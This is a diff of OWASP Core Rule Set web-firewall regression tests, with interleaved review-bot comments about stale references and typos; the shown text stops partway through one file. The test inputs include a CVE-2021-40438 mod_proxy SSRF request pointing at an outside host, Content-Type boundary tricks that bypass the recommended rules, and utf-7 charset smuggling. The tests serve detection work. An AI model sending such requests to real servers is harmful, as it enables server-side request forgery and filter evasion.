--- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921230.yaml @@ -2,22 +2,20 @@ meta: author: "Christian Folini (dune73), azurit" description: "HTTP Range Header" - enabled: true - name: 921230.yaml +rule_id: 921230 tests: - - test_title: 921230-1 + - test_id: 1 desc: "Submit HTTP Range Header, forbidden at PL3 by default" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Range: 1-2 - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "921230" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Range: 1-2 + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log_contains: id "921230" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml index 314f48f32..8272c730a 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921240.yaml 
@@ -2,36 +2,33 @@ meta: author: "Franziska Bühler, azurit" description: "Rule against CVE-2021-40438" - enabled: true - name: 921240.yaml +rule_id: 921240 tests: - - test_title: 921240-1 + - test_id: 1 desc: "Detect attacks against mod_proxy: CVE-2021-40438" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" - - test_title: 921240-2 + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix:AAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log_contains: id "921240" + - test_id: 2 desc: "Detect attacks against mod_proxy: CVE-2021-40438, URI encoded" stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" - version: "HTTP/1.1" - output: - log_contains: id "921240" + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: "/?unix%3AAAAAAAAAA|http://coreruleset.org/" + version: "HTTP/1.1" + output: + log_contains: id "921240" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml index de34bd0f5..61c80b4fd 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml 
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921421.yaml 
@@ -2,198 +2,185 @@ meta: author: "studersi, azurit" description: Test whether the recommended rules can be fooled into using the wrong body processor which can result in bypasses - enabled: true - name: 921421.yaml +rule_id: 921421 tests: - - test_title: 921421-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: 
- log_contains: id "921421" - - test_title: 921421-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921421" - - test_title: 921421-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/soap+xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921421" + - test_id: 6 desc: Negative test for 921421-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-7 + 
- input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 7 desc: Negative test for 921421-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 8 desc: Negative test for 921421-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 9 desc: Negative test for 921421-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 10 desc: 
Negative test for 921421-5 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 11 desc: Negative test for rule 921421-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" - - test_title: 921421-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" + - test_id: 12 desc: Negative test for rule 921421-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921421" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml index c215da6b9..5d69957ec 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml 
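Review bot: The `desc` values of tests 11 and 12 in this hunk (`Negative test for rule 921421-6` and `... 921421-7`) cite tests that are themselves negative cases — this file has five positive cases (1–5) whose negatives are 6–10 — so the cross-references look stale after the renumbering to `test_id`; the 921422 hunk has the same pattern (tests 15–17 cite 7–9, and 17's target, test 9, is a negative test). Since the composite `rule-test` names are still what the overrides file keys on, a wrong reference misleads anyone triaging a platform failure, so I would describe these by content instead, e.g. `desc: "Negative test: text/html with charset parameter must not trigger"` and `desc: "Negative test: ordinary multipart/form-data must not trigger"`. As a style point, `dest_addr: 127.0.0.1` and `Host: localhost` are left unquoted here and in 921422 while every other file in this patch writes `dest_addr: "127.0.0.1"` / `Host: "localhost"`; it parses the same, but quoting keeps the suite uniform.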
+++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921422.yaml 
@@ -2,278 +2,260 @@ meta: author: "studersi, azurit" description: Try to send mime types in different part of Content-Type header - enabled: true - name: 921422.yaml +rule_id: 921422 tests: - - test_title: 921422-1 + - test_id: 1 desc: Bypass targeting recommended rules (rule 200000) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 2 desc: Bypass targeting recommended rules (rule 200006) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/vnd.mycompany.myapp.customer-v2+json" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 3 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 
921422-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 4 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="application/xml" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="application/xml" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 5 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="multipart/related" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 6 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="text/html" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 
921422-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="text/html" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 7 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="image/jpeg" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 8 desc: Bypass targeting recommended rules (rule 200001) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "921422" - - test_title: 921422-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded;boundary="foobar/foobar" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + log_contains: id "921422" + - test_id: 9 desc: Negative test for 921422-1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 10 desc: Negative test for 921422-2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/vnd.mycompany.myapp.customer-v2+json - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/vnd.mycompany.myapp.customer-v2+json + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 11 desc: Negative test for 921422-3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 12 desc: Negative test for 921422-4 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 13 desc: Negative test for 921422-5 stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/soap+xml - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/soap+xml + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 14 desc: Negative test for 921422-6 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 15 desc: Negative test for rule 921422-7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: text/html; charset=UTF-8 - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: text/html; charset=UTF-8 + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 16 desc: Negative test for rule 921422-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=something - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" - - test_title: 921422-17 + - 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=something + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" + - test_id: 17 desc: Negative test for rule 921422-9 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - output: - no_log_contains: id "921422" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----webkitformboundary12w4lszoxn26vnd + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + output: + no_log_contains: id "921422" diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml index f1eeae421..df7716d78 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922100.yaml 
@@ -2,90 +2,86 @@ meta: author: "Felipe Zipitria, Max Leske" description: Test Multipart/form-data - enabled: true - name: 922100.yaml +rule_id: 922100 tests: - - test_title: 922100-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-7 - --boundary - Content-disposition: form-data; name="positive" - Content-Type: text/plain + utf-7 + --boundary + Content-disposition: form-data; name="positive" + Content-Type: text/plain - Let me see if I can use utf-7. - --boundary-- - output: - log_contains: id "922100" - - test_title: 922100-2 + Let me see if I can use utf-7. 
+ --boundary-- + output: + log_contains: id "922100" + - test_id: 2 desc: "Negative test: only allowed charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - This should be good as we use utf-8 that is allowed. - --boundary-- - output: - no_log_contains: id "922100" - - test_title: 922100-3 + This should be good as we use utf-8 that is allowed. 
+ --boundary-- + output: + no_log_contains: id "922100" + - test_id: 3 desc: "Positive test: don't allow substrings of valid charsets when using _charset_" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf- - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain + utf- + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain - utf-8 is valid but utf- should not be. - --boundary-- - output: - log_contains: id "922100" + utf-8 is valid but utf- should not be. + --boundary-- + output: + log_contains: id "922100" diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml index 72e8f269b..ab02ff01a 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922110.yaml 
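Review bot: Test 3 is a positive case (`log_contains: id "922100"`, desc says substrings of valid charsets must be rejected), yet its second multipart part is labelled `Content-disposition: form-data; name="negative"`, which mirrors test 2 rather than test 1 and reads as if the case were expected to pass through. Renaming it `Content-disposition: form-data; name="positive"` makes the intent of the body match the assertion; the rule inspects the `_charset_` part, so the field name should not affect the match, but I would confirm that against the rule before relying on it.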
@@ -2,62 +2,59 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922110.yaml +rule_id: 922110 tests: - - test_title: 922110-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="922110" - Content-Type: text/plain; charset=utf-7 + utf-8 + --boundary + Content-disposition: form-data; name="922110" + Content-Type: text/plain; charset=utf-7 - Knock knock. - --boundary-- - output: - log_contains: id "922110" - - test_title: 922110-2 + Knock knock. 
+ --boundary-- + output: + log_contains: id "922110" + - test_id: 2 desc: "Negative test: utf-8 is allowed" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-disposition: form-data; name="_charset_" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-disposition: form-data; name="_charset_" - utf-8 - --boundary - Content-disposition: form-data; name="negative" - Content-Type: text/plain; charset=utf-8 + utf-8 + --boundary + Content-disposition: form-data; name="negative" + Content-Type: text/plain; charset=utf-8 - I shold be allowed to get in. - --boundary-- - output: - no_log_contains: id "922110" + I shold be allowed to get in. + --boundary-- + output: + no_log_contains: id "922110" diff --git a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml index 71e447a6f..c3d6693a2 100644 --- a/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml +++ b/tests/regression/tests/REQUEST-922-MULTIPART-ATTACK/922120.yaml 
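Review bot: The body text of test 2 carries a typo on the new side, `I shold be allowed to get in.`; it is request payload rather than YAML structure, so it does not affect the assertion, but since the line is rewritten by this patch anyway it is the moment to make it `I should be allowed to get in.`.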
@@ -2,55 +2,52 @@ meta: author: "Felipe Zipitria" description: Test Multipart/form-data - enabled: true - name: 922120.yaml +rule_id: 922120 tests: - - test_title: 922120-1 + - test_id: 1 desc: "Positive test: utf-7 is not in allowed charsets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=boundary - Accept: "*/*" - method: POST - port: 80 - uri: "/post" - version: "HTTP/1.1" - data: | - --boundary - Content-Disposition: form-data; name="flavors" - Content-Transfer-Encoding: 8bit - Content-Type: text/plain; charset=utf-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=boundary + Accept: "*/*" + method: POST + port: 80 + uri: "/post" + version: "HTTP/1.1" + data: | + --boundary + Content-Disposition: form-data; name="flavors" + Content-Transfer-Encoding: 8bit + Content-Type: text/plain; charset=utf-7 - Pineapple. Pizza. - --boundary-- - output: - log_contains: id "922120" - - test_title: 922120-2 + Pineapple. Pizza. 
